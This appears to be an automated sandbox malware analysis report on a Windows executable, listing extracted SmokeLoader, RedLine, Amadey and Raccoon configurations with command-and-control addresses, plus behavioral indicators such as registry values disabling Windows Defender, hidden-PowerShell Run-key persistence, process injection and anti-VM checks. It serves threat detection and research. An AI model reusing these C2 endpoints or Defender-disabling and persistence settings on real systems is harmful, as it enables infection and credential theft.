Analysis
-
max time kernel
124s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20231020-en, locale:en-us, os:windows10-2004-x64, system -
submitted
26/10/2023, 08:33
Static task
static1
Behavioral task
behavioral1
Sample
44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe
Resource
win10v2004-20231020-en
General
-
Target
44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe
-
Size
1.6MB
-
MD5
e167824272e179f39aa669d5488b5872
-
SHA1
a2a3b92d6db2b4bc2313be817d7233eda645feea
-
SHA256
44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1
-
SHA512
dba382038a511fabafbe129d06fa01b994de9a6a58912078221be5a5e16c1ffc520a6310032e267ccd92604d52bf9e8be103ba12744e8d64485d3acb9069e90d
-
SSDEEP
49152:uUcoOxgTTtcDja0CrFZLAiw6TECx5VfZ/+S1G+:Lc7xgTTaDjGZkiLTlx5Vf9X
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
grome
77.91.124.86:19084
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
redline
kinza
77.91.124.86:19084
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Extracted
raccoon
6a6a005b9aa778f606280c5fa24ae595
http://195.123.218.98:80
http://31.192.23
-
user_agent
SunShineMoonLight
Extracted
redline
@ytlogsbot
194.169.175.235:42691
Signatures
-
DcRat 4 IoCs
DarkCrystal (DC) is a new .NET RAT, active since June 2019, capable of loading additional plugins.
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | 44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe
pid | Process
4760 | schtasks.exe
1808 | schtasks.exe
1724 | schtasks.exe
-
Detect ZGRat V1 1 IoCs
resource | yara_rule
behavioral1/memory/5748-633-0x0000000000550000-0x0000000000930000-memory.dmp | family_zgrat_v1
-
Glupteba payload 5 IoCs
resource | yara_rule
behavioral1/memory/5772-664-0x0000000002DE0000-0x00000000036CB000-memory.dmp | family_glupteba
behavioral1/memory/5772-670-0x0000000000400000-0x0000000000D1B000-memory.dmp | family_glupteba
behavioral1/memory/5772-728-0x0000000000400000-0x0000000000D1B000-memory.dmp | family_glupteba
behavioral1/memory/5772-953-0x0000000000400000-0x0000000000D1B000-memory.dmp | family_glupteba
behavioral1/memory/5772-983-0x0000000000400000-0x0000000000D1B000-memory.dmp | family_glupteba
-
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | AppLaunch.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 4891.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | 4891.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 4891.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 4891.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | AppLaunch.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | AppLaunch.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | AppLaunch.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | AppLaunch.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | AppLaunch.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 4891.exe
-
Raccoon Stealer payload 3 IoCs
resource | yara_rule
behavioral1/memory/3632-807-0x0000000000400000-0x000000000041B000-memory.dmp | family_raccoon
behavioral1/memory/3632-818-0x0000000000400000-0x000000000041B000-memory.dmp | family_raccoon
behavioral1/memory/3632-821-0x0000000000400000-0x000000000041B000-memory.dmp | family_raccoon
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource | yara_rule
behavioral1/memory/3364-66-0x0000000000400000-0x000000000043E000-memory.dmp | family_redline
behavioral1/memory/4020-387-0x0000000000560000-0x00000000005BA000-memory.dmp | family_redline
behavioral1/memory/3560-525-0x0000000000AB0000-0x0000000000AEE000-memory.dmp | family_redline
behavioral1/memory/4020-544-0x0000000000400000-0x000000000047E000-memory.dmp | family_redline
behavioral1/memory/3660-604-0x0000000000480000-0x00000000004DA000-memory.dmp | family_redline
behavioral1/memory/3660-638-0x0000000000400000-0x000000000047E000-memory.dmp | family_redline
behavioral1/memory/5620-1163-0x0000000000540000-0x000000000057E000-memory.dmp | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description | pid | Process | procid_target
PID 2308 created 3300 | 2308 | latestX.exe | 37
PID 2308 created 3300 | 2308 | latestX.exe | 37
PID 2308 created 3300 | 2308 | latestX.exe | 37
PID 2308 created 3300 | 2308 | latestX.exe | 37
PID 2308 created 3300 | 2308 | latestX.exe | 37
PID 1040 created 3300 | 1040 | updater.exe | 37
PID 1040 created 3300 | 1040 | updater.exe | 37
PID 1040 created 3300 | 1040 | updater.exe | 37
PID 1040 created 3300 | 1040 | updater.exe | 37
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | latestX.exe
File created | C:\Windows\System32\drivers\etc\hosts | updater.exe
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid | Process
572 | netsh.exe
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up the country code configured in the registry, likely a geofence check.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | 5JG7nd9.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | explothe.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | 906E.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | 7DAE.exe
-
Executes dropped EXE 47 IoCs
pid | Process
2724 | ji2Rk63.exe
1660 | An5dW77.exe
1996 | Ec1Qz04.exe
3236 | hi3HF41.exe
2472 | fU6tW83.exe
4388 | 1ap54Lf4.exe
3296 | 2cN4918.exe
3484 | 3nN42tm.exe
2784 | 4NF601SA.exe
4408 | 5JG7nd9.exe
2468 | explothe.exe
4708 | 6Md9pf5.exe
2264 | 7Rt5OT77.exe
5144 | msedge.exe
5528 | 43DA.exe
3972 | 44A6.exe
6032 | tN1mE9TX.exe
4532 | vC6cO6Ik.exe
3020 | Wj5od8jc.exe
6072 | dk2qX3md.exe
5148 | 1Qi55hp5.exe
5784 | 470A.exe
5628 | 4891.exe
2112 | 4A77.exe
4020 | 4C4C.exe
3560 | 2AB154Bn.exe
5924 | 7DAE.exe
5988 | 7FD2.exe
3660 | 81E6.exe
5780 | toolspub2.exe
5772 | 31839b57a4f11171d6abc8bbc4451ee4.exe
3484 | Conhost.exe
2308 | latestX.exe
5748 | 906E.exe
5544 | toolspub2.exe
3736 | LzmwAqmV.exe
1032 | LzmwAqmV.tmp
6128 | zDriveTools.exe
964 | zDriveTools.exe
3852 | D383.exe
2136 | explothe.exe
3552 | 31839b57a4f11171d6abc8bbc4451ee4.exe
1040 | updater.exe
4684 | csrss.exe
5620 | injector.exe
5008 | windefender.exe
5876 | windefender.exe
-
Loads dropped DLL 7 IoCs
pid | Process
3660 | 81E6.exe
3660 | 81E6.exe
1032 | LzmwAqmV.tmp
1032 | LzmwAqmV.tmp
1032 | LzmwAqmV.tmp
5748 | 906E.exe
264 | rundll32.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 4891.exe
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\7FD2.exe'\"" | 7FD2.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | csrss.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | 43DA.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | Wj5od8jc.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | An5dW77.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | vC6cO6Ik.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | hi3HF41.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | tN1mE9TX.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | dk2qX3md.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | 31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | ji2Rk63.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | Ec1Qz04.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | 44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | fU6tW83.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
description | ioc | Process
File opened for modification | \??\WinMonFS | csrss.exe
-
Drops file in System32 directory 9 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
-
Suspicious use of SetThreadContext 7 IoCs
description | pid | Process | procid_target
PID 4388 set thread context of 1684 | 4388 | 1ap54Lf4.exe | 96
PID 3296 set thread context of 884 | 3296 | 2cN4918.exe | 102
PID 2784 set thread context of 3364 | 2784 | 4NF601SA.exe | 107
PID 5148 set thread context of 4760 | 5148 | 1Qi55hp5.exe | 181
PID 5780 set thread context of 5544 | 5780 | toolspub2.exe | 197
PID 5748 set thread context of 3632 | 5748 | 906E.exe | 209
PID 3852 set thread context of 5620 | 3852 | D383.exe | 261
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | 31839b57a4f11171d6abc8bbc4451ee4.exe
-
Drops file in Program Files directory 25 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\Drive Tools\is-PJAQ4.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-3A837.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-8M6C3.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-PQKAB.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-43JFR.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-6ASJF.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-H8F07.tmp | LzmwAqmV.tmp
File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-08DI6.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-DK6LH.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\Lang\is-Q5GM4.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-V5TAL.tmp | LzmwAqmV.tmp
File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-P4OQT.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-2JD76.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-QVMDJ.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\unins000.dat | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-8KARP.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-6C95R.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-4KKUJ.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-60SOR.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-SV2UP.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-M1GV6.tmp | LzmwAqmV.tmp
File created | C:\Program Files (x86)\Drive Tools\is-DIV49.tmp | LzmwAqmV.tmp
File created | C:\Program Files\Google\Chrome\updater.exe | latestX.exe
-
Drops file in Windows directory 5 IoCs
description | ioc | Process
File created | C:\Windows\windefender.exe | csrss.exe
File opened for modification | C:\Windows\windefender.exe | csrss.exe
File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | 4C4C.exe
File opened for modification | C:\Windows\rss | 31839b57a4f11171d6abc8bbc4451ee4.exe
File created | C:\Windows\rss\csrss.exe | 31839b57a4f11171d6abc8bbc4451ee4.exe
-
Launches sc.exe 11 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1660 | sc.exe
5380 | sc.exe
3972 | sc.exe
4372 | sc.exe
868 | sc.exe
5976 | sc.exe
5824 | sc.exe
456 | sc.exe
5560 | sc.exe
5912 | sc.exe
5524 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid | pid_target | Process | procid_target
4168 | 884 | WerFault.exe | 102
4944 | 4760 | WerFault.exe | 181
2472 | 3660 | WerFault.exe | 189
224 | 3632 | WerFault.exe | 209
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3nN42tm.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3nN42tm.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3nN42tm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4760 | schtasks.exe
1808 | schtasks.exe
1724 | schtasks.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
-
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 
Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" 